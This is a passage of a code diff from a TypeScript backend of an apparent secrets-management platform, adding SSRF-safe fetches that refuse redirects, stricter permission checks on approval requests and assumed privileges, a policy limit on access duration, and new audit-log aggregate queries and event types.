accessApprovalRequestServiceFactory = ({ throw new ForbiddenRequestError({ message: "You are not authorized to modify this request" }); } - const project = await projectDAL.findById(accessApprovalRequest.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(accessApprovalRequest.projectId), () => + projectDAL.findById(accessApprovalRequest.projectId) + ); if (!project) { throw new NotFoundError({ @@ -365,6 +373,14 @@ export const accessApprovalRequestServiceFactory = ({ } } + if (policy.maxTimePeriod) { + if (ms(temporaryRange) > ms(policy.maxTimePeriod)) { + 
throw new BadRequestError({ + message: `Requested access time range is limited to ${policy.maxTimePeriod} by policy` + }); + } + } + let envSlug = "unknown"; let secretPath = "/"; let accessTypes: string[] = []; @@ -490,7 +506,7 @@ export const accessApprovalRequestServiceFactory = ({ const project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); if (!project) throw new NotFoundError({ message: `Project with slug '${projectSlug}' not found` }); - await permissionService.getProjectPermission({ + const { permission } = await permissionService.getProjectPermission({ actor, actorId, projectId: project.id, @@ -499,9 +515,18 @@ export const accessApprovalRequestServiceFactory = ({ actionProjectType: ActionProjectType.SecretManager }); + const canReadAllApprovalRequests = permission.can( + ProjectPermissionApprovalRequestActions.Read, + ProjectPermissionSub.ApprovalRequests + ); + const policies = await accessApprovalPolicyDAL.find({ projectId: project.id }); let requests = await accessApprovalRequestDAL.findRequestsWithPrivilegeByPolicyIds(policies.map((p) => p.id)); + if (!canReadAllApprovalRequests) { + requests = requests.filter((request) => request.requestedByUserId === actorId); + } + if (authorUserId) { requests = requests.filter((request) => request.requestedByUserId === authorUserId); } @@ -610,7 +635,9 @@ export const accessApprovalRequestServiceFactory = ({ throw new ForbiddenRequestError({ message: "You are not authorized to approve this request" }); } - const project = await projectDAL.findById(accessApprovalRequest.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(accessApprovalRequest.projectId), () => + projectDAL.findById(accessApprovalRequest.projectId) + ); if (!project) { throw new NotFoundError({ message: "The project associated with this access request was not found." 
}); } @@ -765,8 +792,6 @@ export const accessApprovalRequestServiceFactory = ({ }, tx ); - - await permissionService.invalidateProjectPermissionCache(accessApprovalRequest.projectId, tx); } } @@ -886,8 +911,6 @@ export const accessApprovalRequestServiceFactory = ({ await additionalPrivilegeDAL.deleteById(accessApprovalRequest.privilegeId, tx); } - await permissionService.invalidateProjectPermissionCache(accessApprovalRequest.projectId, tx); - return result; }); @@ -905,7 +928,7 @@ export const accessApprovalRequestServiceFactory = ({ const project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); if (!project) throw new NotFoundError({ message: `Project with slug '${projectSlug}' not found` }); - await permissionService.getProjectPermission({ + const { permission } = await permissionService.getProjectPermission({ actor, actorId, projectId: project.id, @@ -914,7 +937,16 @@ export const accessApprovalRequestServiceFactory = ({ actionProjectType: ActionProjectType.SecretManager }); - const count = await accessApprovalRequestDAL.getCount({ projectId: project.id, policyId }); + const canReadAllApprovalRequests = permission.can( + ProjectPermissionApprovalRequestActions.Read, + ProjectPermissionSub.ApprovalRequests + ); + + const count = await accessApprovalRequestDAL.getCount({ + projectId: project.id, + policyId, + requestedByUserId: canReadAllApprovalRequests ? 
undefined : actorId + }); return { count }; }; diff --git a/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts b/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts index 3b3f331c526..d38e8294853 100644 --- a/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts +++ b/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts @@ -9,7 +9,7 @@ import { CallToolRequestSchema, ListToolsRequestSchema } from "@modelcontextprot import { z } from "zod"; import { ActionProjectType, TAiMcpEndpoints } from "@app/db/schemas"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto as cryptoModule } from "@app/lib/crypto"; import { DatabaseErrorCode } from "@app/lib/error-codes"; @@ -28,6 +28,7 @@ import { TUserDALFactory } from "@app/services/user/user-dal"; import { TAiMcpActivityLogServiceFactory } from "../ai-mcp-activity-log/ai-mcp-activity-log-service"; import { TAiMcpServerDALFactory } from "../ai-mcp-server/ai-mcp-server-dal"; import { AiMcpServerCredentialMode } from "../ai-mcp-server/ai-mcp-server-enum"; +import { ssrfSafeMcpFetch } from "../ai-mcp-server/ai-mcp-server-fns"; import { TAiMcpServerServiceFactory } from "../ai-mcp-server/ai-mcp-server-service"; import { TAiMcpServerToolDALFactory } from "../ai-mcp-server/ai-mcp-server-tool-dal"; import { TAiMcpServerUserCredentialDALFactory } from "../ai-mcp-server/ai-mcp-server-user-credential-dal"; @@ -112,8 +113,6 @@ const OauthChallengeCodeSchema = z.object({ }) }); -const OAUTH_FLOW_EXPIRY_IN_SECS = 5 * 60; - // PKCE challenge computation const computePkceChallenge = (codeVerifier: string) => { const sha256 = crypto.createHash("sha256").update(codeVerifier).digest(); @@ -322,6 +321,7 @@ export const aiMcpEndpointServiceFactory = ({ }); const clientTransport = new 
StreamableHTTPClientTransport(new URL(serverUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers } }); @@ -1017,7 +1017,7 @@ export const aiMcpEndpointServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthClient(clientId), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify(payload) ); @@ -1033,7 +1033,7 @@ export const aiMcpEndpointServiceFactory = ({ // Update with state await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthClient(clientId), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify({ ...JSON.parse(oauthClientCache), state }) ); }; @@ -1083,7 +1083,7 @@ export const aiMcpEndpointServiceFactory = ({ const code = crypto.randomBytes(32).toString("hex"); await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthCode(clientId, code), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify({ codeChallenge, codeChallengeMethod, @@ -1352,6 +1352,7 @@ export const aiMcpEndpointServiceFactory = ({ }); const transport = new StreamableHTTPClientTransport(new URL(targetUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers: { Authorization: `Bearer ${accessToken}` @@ -1368,11 +1369,12 @@ export const aiMcpEndpointServiceFactory = ({ const err = error as { code?: string | number; cause?: { code?: string } }; const errCode = err?.code || err?.cause?.code; - let message = "An unknown error occurred"; + // All non-auth failures share one message: separating connection-refused + // from other errors would let an attacker probe whether internal ports + // are open by cycling redirect targets. 
+ let message = "Unable to verify token"; if (errCode === 401 || errCode === 403) { message = "Invalid token"; - } else if (errCode === "ECONNREFUSED" || errCode === "ENOTFOUND" || errCode === "ETIMEDOUT") { - message = "Server unreachable"; } return { valid: false, message }; diff --git a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts new file mode 100644 index 00000000000..c31dce6e249 --- /dev/null +++ b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts @@ -0,0 +1,5 @@ +// Refuses to follow HTTP redirects when talking to an MCP server. The server URL +// is validated against private IPs at registration time; without this, a 302 at +// request time could redirect the backend fetch to internal network addresses. +export const ssrfSafeMcpFetch = (url: string | URL, init?: RequestInit): Promise => + fetch(url, { ...init, redirect: "manual" }); diff --git a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts index 859162d7ee7..9b81452707e 100644 --- a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts +++ b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts @@ -7,11 +7,11 @@ import { Client } from "@modelcontextprotocol/sdk/client/index.js"; // eslint-disable-next-line @typescript-eslint/ban-ts-comment // @ts-ignore - MCP SDK uses ESM with .js extensions which don't resolve types with moduleResolution: "Node" import { StreamableHTTPClientTransport } from "@modelcontextprotocol/sdk/client/streamableHttp.js"; -import axios from "axios"; +import { isAxiosError } from "axios"; import { ActionProjectType, OrganizationActionScope } from "@app/db/schemas"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from 
"@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { request } from "@app/lib/config/request"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -30,6 +30,7 @@ import { TPermissionServiceFactory } from "../permission/permission-service-type import { ProjectPermissionActions, ProjectPermissionSub } from "../permission/project-permission"; import { TAiMcpServerDALFactory } from "./ai-mcp-server-dal"; import { AiMcpServerAuthMethod, AiMcpServerCredentialMode, AiMcpServerStatus } from "./ai-mcp-server-enum"; +import { ssrfSafeMcpFetch } from "./ai-mcp-server-fns"; import { TAiMcpServerToolDALFactory } from "./ai-mcp-server-tool-dal"; import { TAiMcpServerCredentials, @@ -64,8 +65,6 @@ type TAiMcpServerServiceFactoryDep = { export type TAiMcpServerServiceFactory = ReturnType; -const OAUTH_SESSION_TTL_SECONDS = 10 * 60; // 10 minutes - // Buffer time before token expiry to trigger refresh (5 minutes) const TOKEN_REFRESH_BUFFER_MS = 5 * 60 * 1000; @@ -86,12 +85,12 @@ const refreshOAuthToken = async ( try { // First try: origin-only format const originOnlyUrl = `${serverUrlObj.origin}/.well-known/oauth-authorization-server`; - const { data } = await request.get(originOnlyUrl); + const { data } = await ssrfSafeGet(originOnlyUrl); serverMetadata = data; } catch { // Second try: origin + pathname format const pathnameUrl = `${serverUrlObj.origin}/.well-known/oauth-authorization-server${serverUrlObj.pathname !== "/" ? 
serverUrlObj.pathname : ""}`; - const { data } = await request.get(pathnameUrl); + const { data } = await ssrfSafeGet(pathnameUrl); serverMetadata = data; } @@ -106,7 +105,7 @@ const refreshOAuthToken = async ( tokenParams.client_secret = clientSecret; } - const { data: tokenResponse } = await request.post( + const { data: tokenResponse } = await ssrfSafePost( serverMetadata.token_endpoint, new URLSearchParams(tokenParams).toString(), { @@ -221,6 +220,7 @@ export const aiMcpServerServiceFactory = ({ } const transport = new StreamableHTTPClientTransport(new URL(targetUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers: { Authorization: `Bearer ${accessToken}` @@ -441,7 +441,7 @@ export const aiMcpServerServiceFactory = ({ } } catch (err) { // Log non-404 errors for debugging, but still fall through - if (!axios.isAxiosError(err) || err.response?.status !== 404) { + if (!isAxiosError(err) || err.response?.status !== 404) { logger.warn(err, "Failed to fetch OAuth authorization server metadata"); } } @@ -609,7 +609,7 @@ export const aiMcpServerServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpServerOAuth(sessionId), - OAUTH_SESSION_TTL_SECONDS, + KeyStoreTtls.AiMcpServerOAuthSessionInSeconds, JSON.stringify(sessionData) ); @@ -695,7 +695,7 @@ export const aiMcpServerServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpServerOAuth(sessionId), - OAUTH_SESSION_TTL_SECONDS, + KeyStoreTtls.AiMcpServerOAuthSessionInSeconds, JSON.stringify(updatedSession) ); diff --git a/backend/src/ee/services/assume-privilege/assume-privilege-service.ts b/backend/src/ee/services/assume-privilege/assume-privilege-service.ts index 491db592846..679898ed91c 100644 --- a/backend/src/ee/services/assume-privilege/assume-privilege-service.ts +++ b/backend/src/ee/services/assume-privilege/assume-privilege-service.ts @@ -3,9 +3,8 @@ import { ForbiddenError, subject } from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; 
import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; -import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { ForbiddenRequestError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; import { @@ -16,12 +15,10 @@ import { import { TAssumePrivilegeServiceFactory } from "./assume-privilege-types"; type TAssumePrivilegeServiceFactoryDep = { - projectDAL: Pick; permissionService: Pick; }; export const assumePrivilegeServiceFactory = ({ - projectDAL, permissionService }: TAssumePrivilegeServiceFactoryDep): TAssumePrivilegeServiceFactory => { const assumeProjectPrivileges: TAssumePrivilegeServiceFactory["assumeProjectPrivileges"] = async ({ @@ -31,8 +28,6 @@ export const assumePrivilegeServiceFactory = ({ actorPermissionDetails, tokenVersionId }) => { - const project = await projectDAL.findById(projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor: actorPermissionDetails.type, actorId: actorPermissionDetails.id, @@ -80,9 +75,11 @@ export const assumePrivilegeServiceFactory = ({ return { actorType: targetActorType, actorId: targetActorId, projectId, assumePrivilegesToken }; }; - const verifyAssumePrivilegeToken: TAssumePrivilegeServiceFactory["verifyAssumePrivilegeToken"] = ( + const verifyAssumePrivilegeToken: TAssumePrivilegeServiceFactory["verifyAssumePrivilegeToken"] = async ( token, - tokenVersionId + tokenVersionId, + actorAuthMethod, + actorOrgId ) => { const appCfg = getConfig(); const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as { @@ -95,6 +92,28 @@ export const assumePrivilegeServiceFactory = ({ if (decodedToken.tokenVersionId !== tokenVersionId) { 
throw new ForbiddenRequestError({ message: "Invalid token version" }); } + + const requesterPermission = await permissionService.getProjectPermission({ + actor: ActorType.USER, + actorId: decodedToken.requesterId, + projectId: decodedToken.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.Any + }); + + if (decodedToken.actorType === ActorType.USER) { + ForbiddenError.from(requesterPermission.permission).throwUnlessCan( + ProjectPermissionMemberActions.AssumePrivileges, + ProjectPermissionSub.Member + ); + } else { + ForbiddenError.from(requesterPermission.permission).throwUnlessCan( + ProjectPermissionIdentityActions.AssumePrivileges, + subject(ProjectPermissionSub.Identity, { identityId: decodedToken.actorId }) + ); + } + return decodedToken; }; diff --git a/backend/src/ee/services/assume-privilege/assume-privilege-types.ts b/backend/src/ee/services/assume-privilege/assume-privilege-types.ts index 999fcce41ac..095ef0f8bd8 100644 --- a/backend/src/ee/services/assume-privilege/assume-privilege-types.ts +++ b/backend/src/ee/services/assume-privilege/assume-privilege-types.ts @@ -1,5 +1,5 @@ import { OrgServiceActor } from "@app/lib/types"; -import { ActorType } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; export type TAssumeProjectPrivilegeDTO = { targetActorType: ActorType.USER | ActorType.IDENTITY; @@ -24,12 +24,14 @@ export interface TAssumePrivilegeServiceFactory { }>; verifyAssumePrivilegeToken: ( token: string, - tokenVersionId: string - ) => { + tokenVersionId: string, + actorAuthMethod: ActorAuthMethod, + actorOrgId: string + ) => Promise<{ tokenVersionId: string; projectId: string; requesterId: string; actorType: ActorType; actorId: string; - }; + }>; } diff --git a/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts b/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts index d9250b29cda..47dc1a24ee3 100644 --- 
a/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts +++ b/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts @@ -29,7 +29,8 @@ export const CustomProviderFactory = () => { { ping: "ok" }, { headers: streamHeaders, - timeout: AUDIT_LOG_STREAM_TIMEOUT + timeout: AUDIT_LOG_STREAM_TIMEOUT, + maxRedirects: 0 } ) .catch((err) => { diff --git a/backend/src/ee/services/audit-log/audit-log-dal.ts b/backend/src/ee/services/audit-log/audit-log-dal.ts index 7ad9233d0cf..cf4d8763f9f 100644 --- a/backend/src/ee/services/audit-log/audit-log-dal.ts +++ b/backend/src/ee/services/audit-log/audit-log-dal.ts @@ -13,6 +13,14 @@ import { ActorType } from "@app/services/auth/auth-type"; import { ACTOR_TYPE_TO_METADATA_ID_KEY, EventType, filterableSecretEvents } from "./audit-log-types"; +type TAggregateQuery = { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; +}; + export interface TAuditLogDALFactory extends Omit, "find"> { pruneAuditLog: () => Promise; getApproximateRowCount: () => Promise; @@ -27,6 +35,15 @@ export interface TAuditLogDALFactory extends Omit, " }, tx?: knex.Knex ) => Promise; + countByDateAndActor: ( + arg: TAggregateQuery, + tx?: knex.Knex + ) => Promise<{ date: string; actor: string; actorMetadata: unknown; count: number }[]>; + countByIpAddress: (arg: TAggregateQuery, tx?: knex.Knex) => Promise<{ ipAddress: string; count: number }[]>; + countByAuthMethod: ( + arg: TAggregateQuery, + tx?: knex.Knex + ) => Promise<{ actor: string; actorMetadata: unknown; count: number }[]>; } type TFindQuery = { @@ -248,5 +265,111 @@ export const auditLogDALFactory = (db: TDbClient) => { return auditLogOrm.create(tx); }; - return { ...auditLogOrm, create, pruneAuditLog, getApproximateRowCount, find }; + const countByDateAndActor = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + 
startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .select( + db.raw(`DATE("${TableName.AuditLog}"."createdAt") as date`), + `${TableName.AuditLog}.actor`, + `${TableName.AuditLog}.actorMetadata` + ) + .groupByRaw( + `DATE("${TableName.AuditLog}"."createdAt"), "${TableName.AuditLog}"."actor", "${TableName.AuditLog}"."actorMetadata"` + ) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { date: string; actor: string; actorMetadata: unknown; count: number }[]; + }; + + const countByIpAddress = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .whereNotNull(`${TableName.AuditLog}.ipAddress`) + .select(`${TableName.AuditLog}.ipAddress`) + .groupBy(`${TableName.AuditLog}.ipAddress`) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { ipAddress: string; count: number }[]; + }; + + const countByAuthMethod = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + 
startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .select(`${TableName.AuditLog}.actor`, `${TableName.AuditLog}.actorMetadata`) + .groupBy(`${TableName.AuditLog}.actor`, `${TableName.AuditLog}.actorMetadata`) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { actor: string; actorMetadata: unknown; count: number }[]; + }; + + return { + ...auditLogOrm, + create, + pruneAuditLog, + getApproximateRowCount, + find, + countByDateAndActor, + countByIpAddress, + countByAuthMethod + }; }; diff --git a/backend/src/ee/services/audit-log/audit-log-service.ts b/backend/src/ee/services/audit-log/audit-log-service.ts index cefcd8349de..9c30f1838a5 100644 --- a/backend/src/ee/services/audit-log/audit-log-service.ts +++ b/backend/src/ee/services/audit-log/audit-log-service.ts @@ -2,7 +2,7 @@ import { ForbiddenError } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; import { ActionProjectType, OrganizationActionScope, TUsers } from "@app/db/schemas"; -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -23,7 +23,6 @@ import { ACTOR_TYPE_TO_METADATA_ID_KEY, EventType, TAuditLogServiceFactory } fro const AUDIT_LOG_ROW_WARNING_THRESHOLD = 350_000_000; const AUDIT_LOG_ALERT_ROW_INCREMENT = 10_000_000; -const AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS = 7 * 24 * 60 * 60; // 7 
days type TAuditLogServiceFactoryDep = { auditLogDAL: TAuditLogDALFactory; @@ -192,7 +191,7 @@ export const auditLogServiceFactory = ({ if (rowCount < AUDIT_LOG_ROW_WARNING_THRESHOLD) return; - const lastAlertedRowCountStr: string | null = await keyStore.getItem("audit-log-migration-alert-last-row-count"); + const lastAlertedRowCountStr: string | null = await keyStore.getItem(KeyStorePrefixes.AuditLogMigrationAlert); const lastAlertedRowCount = lastAlertedRowCountStr ? Number(lastAlertedRowCountStr) : 0; if (lastAlertedRowCount > 0 && rowCount < lastAlertedRowCount + AUDIT_LOG_ALERT_ROW_INCREMENT) return; @@ -210,8 +209,8 @@ export const auditLogServiceFactory = ({ if (superAdminsResult.users.length === 0) { await keyStore.setItemWithExpiry( - "audit-log-migration-alert-last-row-count", - AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS, + KeyStorePrefixes.AuditLogMigrationAlert, + KeyStoreTtls.AuditLogMigrationAlertInSeconds, String(rowCount) ); return; @@ -253,8 +252,8 @@ export const auditLogServiceFactory = ({ }); await keyStore.setItemWithExpiry( - "audit-log-migration-alert-last-row-count", - AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS, + KeyStorePrefixes.AuditLogMigrationAlert, + KeyStoreTtls.AuditLogMigrationAlertInSeconds, String(rowCount) ); logger.info(`checkPostgresAuditLogVolumeMigrationAlert: alert sent to super admins (rowCount=${rowCount})`); diff --git a/backend/src/ee/services/audit-log/audit-log-types.ts b/backend/src/ee/services/audit-log/audit-log-types.ts index 6e5fbb4ddd6..64f6d1a3d09 100644 --- a/backend/src/ee/services/audit-log/audit-log-types.ts +++ b/backend/src/ee/services/audit-log/audit-log-types.ts @@ -1,4 +1,6 @@ import { ProjectType } from "@app/db/schemas"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; import { TCreateProjectTemplateDTO, TUpdateProjectTemplateDTO @@ -88,7 +90,8 @@ export type TCreateAuditLogDTO = { | 
AcmeProfileActor | AcmeAccountActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; orgId?: string; projectId?: string; } & BaseAuthData; @@ -386,6 +389,9 @@ export enum EventType { GET_PKI_ALERT = "get-pki-alert", UPDATE_PKI_ALERT = "update-pki-alert", DELETE_PKI_ALERT = "delete-pki-alert", + CREATE_CERTIFICATE_INVENTORY_VIEW = "create-certificate-inventory-view", + UPDATE_CERTIFICATE_INVENTORY_VIEW = "update-certificate-inventory-view", + DELETE_CERTIFICATE_INVENTORY_VIEW = "delete-certificate-inventory-view", CREATE_PKI_COLLECTION = "create-pki-collection", GET_PKI_COLLECTION = "get-pki-collection", UPDATE_PKI_COLLECTION = "update-pki-collection", @@ -443,6 +449,7 @@ export enum EventType { GET_CERTIFICATE_REQUEST = "get-certificate-request", GET_CERTIFICATE_FROM_REQUEST = "get-certificate-from-request", LIST_CERTIFICATE_REQUESTS = "list-certificate-requests", + TRIGGER_CERTIFICATE_REQUEST_VALIDATION = "trigger-certificate-request-validation", ATTEMPT_CREATE_SLACK_INTEGRATION = "attempt-create-slack-integration", ATTEMPT_REINSTALL_SLACK_INTEGRATION = "attempt-reinstall-slack-integration", GET_PROJECT_SLACK_CONFIG = "get-project-slack-config", @@ -468,6 +475,7 @@ export enum EventType { CMEK_LIST_SIGNING_ALGORITHMS = "cmek-list-signing-algorithms", CMEK_GET_PUBLIC_KEY = "cmek-get-public-key", CMEK_GET_PRIVATE_KEY = "cmek-get-private-key", + CMEK_BULK_EXPORT_PRIVATE_KEYS = "cmek-bulk-export-private-keys", UPDATE_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS = "update-external-group-org-role-mapping", GET_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS = "get-external-group-org-role-mapping", @@ -536,6 +544,7 @@ export enum EventType { CREATE_SECRET_ROTATION = "create-secret-rotation", UPDATE_SECRET_ROTATION = "update-secret-rotation", DELETE_SECRET_ROTATION = "delete-secret-rotation", + MOVE_SECRET_ROTATION = "move-secret-rotation", SECRET_ROTATION_ROTATE_SECRETS = "secret-rotation-rotate-secrets", RECONCILE_SECRET_ROTATION = "reconcile-secret-rotation", @@ 
-596,6 +605,12 @@ export enum EventType { DASHBOARD_GET_SECRET_VALUE = "dashboard-get-secret-value", DASHBOARD_GET_SECRET_VERSION_VALUE = "dashboard-get-secret-version-value", + VIEW_INSIGHTS_AUTH_METHODS = "view-insights-auth-methods", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR = "view-insights-secrets-management-calendar", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME = "view-insights-secrets-management-access-volume", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS = "view-insights-secrets-management-access-locations", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY = "view-insights-secrets-management-summary", + PAM_SESSION_CREDENTIALS_GET = "pam-session-credentials-get", PAM_SESSION_START = "pam-session-start", PAM_SESSION_LOGS_UPDATE = "pam-session-logs-update", @@ -610,6 +625,7 @@ export enum EventType { PAM_ACCOUNT_LIST = "pam-account-list", PAM_ACCOUNT_GET = "pam-account-get", PAM_ACCOUNT_ACCESS = "pam-account-access", + PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED = "pam-account-aws-console-url-generated", PAM_ACCOUNT_CREATE = "pam-account-create", PAM_ACCOUNT_UPDATE = "pam-account-update", PAM_ACCOUNT_DELETE = "pam-account-delete", @@ -627,6 +643,11 @@ export enum EventType { PAM_RESOURCE_CREATE = "pam-resource-create", PAM_RESOURCE_UPDATE = "pam-resource-update", PAM_RESOURCE_DELETE = "pam-resource-delete", + PAM_DOMAIN_LIST = "pam-domain-list", + PAM_DOMAIN_GET = "pam-domain-get", + PAM_DOMAIN_CREATE = "pam-domain-create", + PAM_DOMAIN_UPDATE = "pam-domain-update", + PAM_DOMAIN_DELETE = "pam-domain-delete", PAM_DISCOVERY_SOURCE_LIST = "pam-discovery-source-list", PAM_DISCOVERY_SOURCE_GET = "pam-discovery-source-get", PAM_DISCOVERY_SOURCE_CREATE = "pam-discovery-source-create", @@ -736,16 +757,33 @@ export enum EventType { PKI_SIGNER_SIGN = "pki-signer-sign", SCEP_ENROLLMENT = "scep-enrollment", SCEP_RENEWAL = "scep-renewal", + SCEP_DYNAMIC_CHALLENGE_GENERATED = "scep-dynamic-challenge-generated", // Secret Validation Rules SECRET_VALIDATION_RULE_CREATE = 
"secret-validation-rule-create", SECRET_VALIDATION_RULE_UPDATE = "secret-validation-rule-update", SECRET_VALIDATION_RULE_DELETE = "secret-validation-rule-delete", + // External Migration + EXTERNAL_MIGRATION_CREATE = "external-migration-create", + EXTERNAL_MIGRATION_UPDATE = "external-migration-update", + EXTERNAL_MIGRATION_DELETE = "external-migration-delete", // Email Domains CREATE_EMAIL_DOMAIN = "create-email-domain", VERIFY_EMAIL_DOMAIN = "verify-email-domain", - DELETE_EMAIL_DOMAIN = "delete-email-domain" + DELETE_EMAIL_DOMAIN = "delete-email-domain", + + // Gateway Enrollment Tokens + GATEWAY_CREATE = "gateway-create", + GATEWAY_ENROLLMENT_TOKEN_CREATE = "gateway-enrollment-token-create", + GATEWAY_ENROLL = "gateway-enroll", + + // Gateway Pools + GATEWAY_POOL_CREATE = "gateway-pool-create", + GATEWAY_POOL_UPDATE = "gateway-pool-update", + GATEWAY_POOL_DELETE = "gateway-pool-delete", + GATEWAY_POOL_ADD_MEMBER = "gateway-pool-add-member", + GATEWAY_POOL_REMOVE_MEMBER = "gateway-pool-remove-member" } // Maps each actor type to the JSONB key that holds the actor's primary ID in actorMetadata. 
